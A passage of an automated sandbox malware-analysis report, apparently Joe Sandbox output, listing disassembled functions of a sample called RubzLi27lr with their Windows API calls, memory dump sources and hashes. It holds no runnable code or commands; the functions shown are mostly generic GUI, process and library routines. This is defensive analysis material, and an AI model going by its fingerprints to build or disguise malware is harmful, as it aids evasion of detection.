                                                                                                                  • SetLastError.KERNEL32(00000000,?,00AD3379,00AD2FE5), ref: 00AD3409
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 1e4260d3287bfc920cc5bfa65752948c94a4ff55bc151d0e2a4c0a72db0b3829
                                                                                                                  • Instruction ID: 719a306d481be65cb86d70bdd36074f669ccd0cc26224a90649c83912a6bc2df
                                                                                                                  • Opcode Fuzzy Hash: 1e4260d3287bfc920cc5bfa65752948c94a4ff55bc151d0e2a4c0a72db0b3829
                                                                                                                  • Instruction Fuzzy Hash: E2012433209311BEAE262BB47E856673E94FB05779320022FF412863F0EF218E019286
                                                                                                                  Function 00AE2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00AE5686,00AF3CD6,?,00000000,?,00AE5B6A,?,?,?,?,?,00ADE6D1,?,00B78A48), ref: 00AE2D78
                                                                                                                  • _free.LIBCMT ref: 00AE2DAB
                                                                                                                  • _free.LIBCMT ref: 00AE2DD3
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ADE6D1,?,00B78A48,00000010,00AB4F4A,?,?,00000000,00AF3CD6), ref: 00AE2DE0
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ADE6D1,?,00B78A48,00000010,00AB4F4A,?,?,00000000,00AF3CD6), ref: 00AE2DEC
                                                                                                                  • _abort.LIBCMT ref: 00AE2DF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3160817290-0
                                                                                                                  • Opcode ID: 8a30faf23c6965837871ae2e8f83aadb04840eda91d7fd7023bfaec3e8b05bc8
                                                                                                                  • Instruction ID: 521a4690418bae53726ec606cbcec4d710e4f59aa6c01d4ba470d57664edf827
                                                                                                                  • Opcode Fuzzy Hash: 8a30faf23c6965837871ae2e8f83aadb04840eda91d7fd7023bfaec3e8b05bc8
                                                                                                                  • Instruction Fuzzy Hash: 1FF0283690568027D6523737BD4AF5A2A6DBFC2BA0F314028FA24D31E2EE3489014320
                                                                                                                  Function 00B48A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AC9693
                                                                                                                    • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96A2
                                                                                                                    • Part of subcall function 00AC9639: BeginPath.GDI32(?), ref: 00AC96B9
                                                                                                                    • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96E2
                                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B48A4E
                                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00B48A62
                                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B48A70
                                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00B48A80
                                                                                                                  • EndPath.GDI32(?), ref: 00B48A90
                                                                                                                  • StrokePath.GDI32(?), ref: 00B48AA0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 43455801-0
                                                                                                                  • Opcode ID: c5c9f293d2a4be07704f2305a997fef838ca33781220c96f384e88bfa4ddac0c
                                                                                                                  • Instruction ID: 70ff67ca2447004e461260e4e8efc2a643eb6c1c266d773915e43f03ab9b7e2f
                                                                                                                  • Opcode Fuzzy Hash: c5c9f293d2a4be07704f2305a997fef838ca33781220c96f384e88bfa4ddac0c
                                                                                                                  • Instruction Fuzzy Hash: E3110976001148FFDB129F94DC88EAA7FACFB09350F048052FA199A1A1CB719E55DBA0
                                                                                                                  Function 00B151FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00B15218
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B15229
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B15230
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B15238
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B1524F
                                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B15261
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1035833867-0
                                                                                                                  • Opcode ID: bbd6955ed1384cf42175952df5276a74e6fefe6d3cc8a9cf6e8768c811094cdd
                                                                                                                  • Instruction ID: 8aaded497f3ad952278b8365829afa691d4fde413275adc9c4b0990a12932619
                                                                                                                  • Opcode Fuzzy Hash: bbd6955ed1384cf42175952df5276a74e6fefe6d3cc8a9cf6e8768c811094cdd
                                                                                                                  • Instruction Fuzzy Hash: 24018F75A01709BBEB109BA59C49A5EBFB8FB49751F044065FA04A7290DA709900CBA0
                                                                                                                  Function 00AB1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB1BF4
                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB1BFC
                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB1C07
                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB1C12
                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB1C1A
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB1C22
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4278518827-0
                                                                                                                  • Opcode ID: e7c32529dd99d47d20da146416c0309d7d954e9533f54af4c1dd2baa644f40b2
                                                                                                                  • Instruction ID: 43573fcf5b6f4ec1f2a2a78a37e8350881acb7c63b9f4302ff48a3f5d903e625
                                                                                                                  • Opcode Fuzzy Hash: e7c32529dd99d47d20da146416c0309d7d954e9533f54af4c1dd2baa644f40b2
                                                                                                                  • Instruction Fuzzy Hash: E90144B0902B5ABDE3008F6A8C85A52FEA8FF19754F00411BA15C4BA42C7B5A864CBE5
                                                                                                                  Function 00B1EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B1EB30
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B1EB46
                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00B1EB55
                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B1EB64
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B1EB6E
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B1EB75
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 839392675-0
                                                                                                                  • Opcode ID: 4b5abe5627a95f30508dd26ce58781423643b65a12d17eae8dd64b1d94392079
                                                                                                                  • Instruction ID: b98ab1f61ec83bd1b207fc52b42d0bf589b6d1f13ed429170eae3f53b7263c24
                                                                                                                  • Opcode Fuzzy Hash: 4b5abe5627a95f30508dd26ce58781423643b65a12d17eae8dd64b1d94392079
                                                                                                                  • Instruction Fuzzy Hash: 85F0177A642158BBE6615B629C0EEEB3E7CFBCBF11F004158FA11E20919BA05B0186B5
                                                                                                                  Function 00B07439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?), ref: 00B07452
                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00B07469
                                                                                                                  • GetWindowDC.USER32(?), ref: 00B07475
                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00B07484
                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00B07496
                                                                                                                  • GetSysColor.USER32(00000005), ref: 00B074B0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 272304278-0
                                                                                                                  • Opcode ID: ff4190dc1fc10b6d6727a7057ac1bc2212495e06c92a12f8100d2383f27a451e
                                                                                                                  • Instruction ID: 81c0b5cde064c5e1fcb46a240f3ae426e9e69a8c76d0d888f9530a39fd1da82b
                                                                                                                  • Opcode Fuzzy Hash: ff4190dc1fc10b6d6727a7057ac1bc2212495e06c92a12f8100d2383f27a451e
                                                                                                                  • Instruction Fuzzy Hash: 67017435801215EFEB905FA4DC09BAEBFB5FB05721F2240A4F916A31A1CF312E41EB10
                                                                                                                  Function 00B11874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1187F
                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00B1188B
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B11894
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B1189C
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B118A5
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B118AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 146765662-0
                                                                                                                  • Opcode ID: c4657fa840b04385ba7206ea63ed9678d9dad964e7a0d7580c62de3fcedd3a75
                                                                                                                  • Instruction ID: 60fa885d85140ea3257df57c434c72636f6a4316f145f90d2521a83fe8033288
                                                                                                                  • Opcode Fuzzy Hash: c4657fa840b04385ba7206ea63ed9678d9dad964e7a0d7580c62de3fcedd3a75
                                                                                                                  • Instruction Fuzzy Hash: 8CE0E53A206101BBDB415FA9ED0C90ABF39FF4AF22B108220F22592070CF329520DF50
                                                                                                                  Function 00B1C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B1C6EE
                                                                                                                  • _wcslen.LIBCMT ref: 00B1C735
                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B1C79C
                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B1C7CA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 1227352736-4108050209
                                                                                                                  • Opcode ID: c245e8c4211f0017600b37b321a8493cc43076065a99aa74cd2746a62efd1d01
                                                                                                                  • Instruction ID: ee0c9748a277a205301010ae7bdca604a8cd024d040cc46d7bf9258fc6f440db
                                                                                                                  • Opcode Fuzzy Hash: c245e8c4211f0017600b37b321a8493cc43076065a99aa74cd2746a62efd1d01
                                                                                                                  • Instruction Fuzzy Hash: C551DF716853009BD7119F28C885BEA7BE8EF49310F440AADF9A5D31E1DBA0DD84CB52
                                                                                                                  Function 00B3AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00B3AEA3
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00B3AF38
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B3AF67
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                  • String ID: <$@
                                                                                                                  • API String ID: 146682121-1426351568
                                                                                                                  • Opcode ID: 9507188e001efc387f04b2ae2a23a46c4f3abceffdda8b35ef95252b8174ba7a
                                                                                                                  • Instruction ID: 6d96da2aa5b4a6d89989ac39a7fdaaed19d3590e101d89e845de1473f5e2a7a3
                                                                                                                  • Opcode Fuzzy Hash: 9507188e001efc387f04b2ae2a23a46c4f3abceffdda8b35ef95252b8174ba7a
                                                                                                                  • Instruction Fuzzy Hash: 98719B70A00215DFCB14EF64C585A9EBBF4FF08310F248499E856AB7A2CB74ED45CB91
                                                                                                                  Function 00B1719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B17206
                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B1723C
                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B1724D
                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B172CF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                  • String ID: DllGetClassObject
                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                  • Opcode ID: 982882428716e48986bd4022f0d529183482700f78c11cf0b912393fe79cd2fd
                                                                                                                  • Instruction ID: d8fe2093ddff224fea67a46f37b731e8a3236b62ad23d8cab5f1d049f32a8c62
                                                                                                                  • Opcode Fuzzy Hash: 982882428716e48986bd4022f0d529183482700f78c11cf0b912393fe79cd2fd
                                                                                                                  • Instruction Fuzzy Hash: 30412D71644204AFDB15CF54C884ADA7BF9EF4A710F5480E9BD09DF20ADBB1DA85CBA0
                                                                                                                  Function 00B43D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B43E35
                                                                                                                  • IsMenu.USER32(?), ref: 00B43E4A
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B43E92
                                                                                                                  • DrawMenuBar.USER32 ref: 00B43EA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                                  • Opcode ID: 24207a8d29441f69605996eae14ec977ddaea02b8392965de12a3fd506b7b164
                                                                                                                  • Instruction ID: 309715a3735cb3e3184e67c37b31aecfb2b52e18c4d6e9b41099f3bea5423f21
                                                                                                                  • Opcode Fuzzy Hash: 24207a8d29441f69605996eae14ec977ddaea02b8392965de12a3fd506b7b164
                                                                                                                  • Instruction Fuzzy Hash: 26416875A02209EFDB10DF54D884AAABBF9FF49750F0840A9E915AB250D730AF45DF60
                                                                                                                  Function 00B11DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B11E66
                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B11E79
                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B11EA9
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 2081771294-1403004172
                                                                                                                  • Opcode ID: a47b3f1afb672a4ac1f1e39a33695f34ea1a07861b11f90ed577359778cf1fba
                                                                                                                  • Instruction ID: 03df9bb9ccf77baf1efc498ffedea251850487c2ad74e4c6ad708f42a8ac32ee
                                                                                                                  • Opcode Fuzzy Hash: a47b3f1afb672a4ac1f1e39a33695f34ea1a07861b11f90ed577359778cf1fba
                                                                                                                  • Instruction Fuzzy Hash: 7E216B72A00104BFDB14ABE4CD85DFFBBFCEF46350B504559F925A31E1DB344A459620
                                                                                                                  Function 00B42F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B42F8D
                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00B42F94
                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B42FA9
